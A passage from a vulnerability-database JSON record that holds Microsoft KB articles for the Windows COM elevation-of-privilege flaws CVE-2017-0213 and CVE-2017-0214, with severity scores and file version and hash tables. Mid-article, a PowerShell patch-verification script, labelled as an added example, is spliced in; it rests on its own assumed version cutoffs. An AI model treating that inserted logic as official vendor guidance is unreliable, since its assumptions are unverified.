"AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2021-01-01T22:39:51", "description": "<html><body><p>Resolves a vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An elevation of privilege exists in Windows COM Aggregate Marshaler. An elevation of privilege vulnerability exists when Windows does not validate input correctly before it loads type libraries.<br/><br/>To learn more about the vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):<ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0213\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0213</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0214\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0214</a></li></ul></div><h2>Fixes that are included in this security update</h2><ul><li>Addresses an issue in which some scanners and serial devices may stop working after security update <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://support.microsoft.com/en-us/help/4074852/security-update-for-vulnerabilities-in-windows-wes09-and-posready-2009\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">4074852</a>\u00a0is applied.</li></ul><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3>Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to turn on automatic updating, see <a href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faqx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4466388\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website.</div></div><p><strong class=\"sbody-strong\">Important </strong></p><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul><h2>More information</h2><h3>Prerequisites</h3><p>There are no prerequisites for installing this update.</p><h3>Restart information</h3><p>You may have to restart the computer after you apply this update.</p><h3>Update replacement information</h3><p>This update doesn't replace a previously released update.</p><h2>More information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\"><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" managed-link=\"\" target=\"_blank\">Protect yourself online</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: 
<a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></span></div><span> </span></td></tr></tbody></table></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>WindowsXP-KB4466388-x86-Embedded-ENU.exe</td><td>A55F6E9011156548AB9722DE332F609B17B415D0</td><td>A742F8B84FF530CC7A0205B629C9677352EA85B258DE020224AC6D9E279A8A02</td></tr></tbody></table></td></tr></tbody></table><p><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. 
Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows XP</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">x86 Windows XP</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7593</td><td>993,792</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7593</td><td>720,384</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7593</td><td>1,299,968</td><td>06-Nov-2018</td><td>06:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7593</td><td>563,200</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7593</td><td>404,480</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-13T00:00:00", "type": "mskb", "title": "Description of the security update for the Windows COM elevation of privilege vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009: November 13, 2018", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214", "CVE-2017-0213"], "modified": "2018-11-14T01:06:17", "id": "KB4466388", "href": "https://support.microsoft.com/en-us/help/4466388/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-31T14:39:30", "description": "## Summary\n\nAn elevation of privilege vulnerability exists in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. 
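Added here as an example, not code from the Microsoft KB article or from the OpenVAS plugin: a PowerShell check an administrator can run before or after either delivery method to confirm that a Windows Server 2008 SP2 host actually carries the COM binaries this update ships, and to verify a downloaded stand-alone package against the SHA256 values published in this article's File Information section. The file versions and hashes are the ones listed in the article; the function names, the revision cutoff of 20000 used to tell the GDR branch (6.0.6002.19773) from the LDR/QFE branch (6.0.6002.24089), and the assumption of an elevated session and PowerShell 4 or later for Get-FileHash are assumptions made for this example. A plain version comparison is not enough on this platform: an LDR-branch host at a 6.0.6002.2xxxx revision below 24089 is unpatched even though its number exceeds 19773, and Kernel32.dll and Ntdll.dll in the same package are older revisions (19623), so they are deliberately not held to the 19773 requirement.

```powershell
# Added example, not code from the KB article. Checks a Windows Server 2008 SP2
# host for the KB4018556 COM binaries and verifies a downloaded .msu package.
# Assumptions: run from an elevated PowerShell; Get-FileHash (PowerShell 4+)
# is available wherever the package hash is verified (an admin workstation is fine).

# Patched file versions from this article's file information tables.
# The GDR branch (revision 1xxxx) and the LDR/QFE branch (revision 2xxxx) are
# serviced separately, so the required version depends on the branch the host
# is on; the 20000 cutoff is an assumption for this example.
$RequiredVersion = @{
    GDR = [version]'6.0.6002.19773'
    LDR = [version]'6.0.6002.24089'
}

function Get-FileVersionObject {
    param([Parameter(Mandatory = $true)][string]$Path)
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    # Build from the numeric parts; the FileVersion string on this platform
    # carries a trailing build tag such as "(vistasp2_gdr.170414-1158)".
    New-Object System.Version($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
}

function Test-Kb4018556Binary {
    param([Parameter(Mandatory = $true)][string]$Path)
    $ver    = Get-FileVersionObject -Path $Path
    $branch = if ($ver.Revision -ge 20000) { 'LDR' } else { 'GDR' }
    New-Object PSObject -Property @{
        File     = $Path
        Version  = $ver
        Branch   = $branch
        Required = $RequiredVersion[$branch]
        Patched  = ($ver -ge $RequiredVersion[$branch])
    }
}

function Test-Kb4018556Host {
    # Ole32.dll and Rpcss.dll are the COM-BASE-QFE binaries in the tables and
    # Oleaut32.dll ships at the same revision. Kernel32.dll/Ntdll.dll are
    # older (19623) in this package and are intentionally not checked.
    # 64-bit packages also carry 32-bit copies, which land under SysWOW64.
    $names = 'ole32.dll', 'rpcss.dll', 'oleaut32.dll'
    $dirs  = @("$env:SystemRoot\System32")
    if (Test-Path "$env:SystemRoot\SysWOW64\ole32.dll") { $dirs += "$env:SystemRoot\SysWOW64" }
    $results = foreach ($d in $dirs) {
        foreach ($n in $names) { Test-Kb4018556Binary -Path (Join-Path $d $n) }
    }
    $results | Format-Table File, Version, Branch, Required, Patched -AutoSize | Out-Host
    # Cross-check against the servicing stack's own record of the package.
    $hotfix = Get-HotFix -Id KB4018556 -ErrorAction SilentlyContinue
    if ($hotfix) { Write-Host "KB4018556 recorded as installed on $($hotfix.InstalledOn)" }
    else         { Write-Host "KB4018556 not recorded by Get-HotFix" }
    return -not ($results | Where-Object { -not $_.Patched })
}

function Test-Kb4018556Package {
    param([Parameter(Mandatory = $true)][string]$Path)
    # SHA256 values from the "File hash information" table in this article.
    $expected = @{
        'Windows6.0-KB4018556-x86.msu'  = '254A546922E4052BC2DD0036C67AABED643E6A2F8182C1D1663C9F1582DE1EA6'
        'Windows6.0-KB4018556-x64.msu'  = 'F399A7F1A58A299C10C72E206665CD23C0182E339F128A4E3835D6DC0ADF3546'
        'Windows6.0-KB4018556-ia64.msu' = '8996176D602E9F25899C25CCD9052404F3CCB02FBC265BB38D4A29DFA6A61B2C'
    }
    $name = Split-Path -Leaf $Path
    if (-not $expected.ContainsKey($name)) { throw "No published SHA256 for '$name'" }
    $actual = (Get-FileHash -Algorithm SHA256 -LiteralPath $Path).Hash
    if ($actual -ne $expected[$name]) {
        throw "Hash mismatch for $($name): got $actual, expected $($expected[$name])"
    }
    "$name matches the published SHA256"
}

# Usage (paths are placeholders):
#   Test-Kb4018556Package -Path C:\patches\Windows6.0-KB4018556-x64.msu
#   Test-Kb4018556Host
```

Verify the package hash on the workstation that downloaded it, before copying it to the server; Test-Kb4018556Host returns $true only when every checked binary meets the requirement for its own branch, and the Get-HotFix line is a secondary signal, since a package can be recorded as installed while a later branch-crossing update has replaced the binaries.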
When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018556>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018556-ia64.msu| 78887F2993AED4D8DCEBA958A362134E40F5B116| 8996176D602E9F25899C25CCD9052404F3CCB02FBC265BB38D4A29DFA6A61B2C \nWindows6.0-KB4018556-x64.msu| 4728E8EAC4BD21D2F037349A59540EF40888177D| F399A7F1A58A299C10C72E206665CD23C0182E339F128A4E3835D6DC0ADF3546 \nWindows6.0-KB4018556-x86.msu| 7766800F74B02A4062E52BE4F39B4BB1C17E9849| 254A546922E4052BC2DD0036C67AABED643E6A2F8182C1D1663C9F1582DE1EA6 \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the 
attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 03:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 01:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 03:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 04:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 03:21| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 16:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 16:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 16:56| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,964,544| 06-Feb-2016| 01:39| IA-64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,963,520| 07-Apr-2017| 15:16| IA-64| Not applicable \nOle32.dll| 6.0.6002.19773| 4,193,792| 14-Apr-2017| 20:16| IA-64| 
IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 4,188,160| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 1,216,000| 14-Apr-2017| 20:16| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 1,220,096| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:18| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:16| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:13| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:23| Not applicable| Not applicable 
\nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:46| Not applicable| Not applicable \nComcat.dll| 6.0.6001.18000| 13,312| 19-Jan-2008| 08:26| IA-64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:05| IA-64| Not applicable \nComcat.dll| 6.0.6002.24089| 13,312| 07-Apr-2017| 15:16| IA-64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:36| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 145,920| 12-Aug-2016| 18:54| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 150,016| 07-Apr-2017| 15:16| IA-64| Not applicable \nKernel32.dll| 6.0.6002.19623| 2,191,360| 18-Mar-2016| 16:33| Not applicable| Not applicable \nKernel32.dll| 6.0.6002.24089| 2,193,920| 07-Apr-2017| 15:16| IA-64| Not applicable \nNtdll.dll| 6.0.6002.19623| 2,575,672| 21-Mar-2016| 22:52| IA-64| Not applicable \nNtdll.dll| 6.0.6002.24089| 2,552,048| 11-Apr-2017| 04:03| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 2,023,424| 14-Apr-2017| 20:16| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 2,025,472| 07-Apr-2017| 15:17| IA-64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 9,484,008| 06-Apr-2017| 15:57| IA-64| Not applicable 
\nNtoskrnl.exe| 6.0.6002.24089| 9,469,672| 07-Apr-2017| 15:44| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 3,298,816| 06-Feb-2016| 01:41| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 3,289,088| 07-Apr-2017| 15:17| IA-64| Not applicable \nSmss.exe| 6.0.6002.19598| 159,232| 06-Feb-2016| 00:36| IA-64| Not applicable \nSmss.exe| 6.0.6002.24089| 159,232| 07-Apr-2017| 14:22| IA-64| Not applicable \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-May-2014| 23:57| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 27,648| 06-Feb-2016| 01:41| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 524,288| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 617,984| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-Mar-2016| 23:41| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 27,648| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 524,288| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 617,984| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| 
Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 22:52| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:03| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 
360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not 
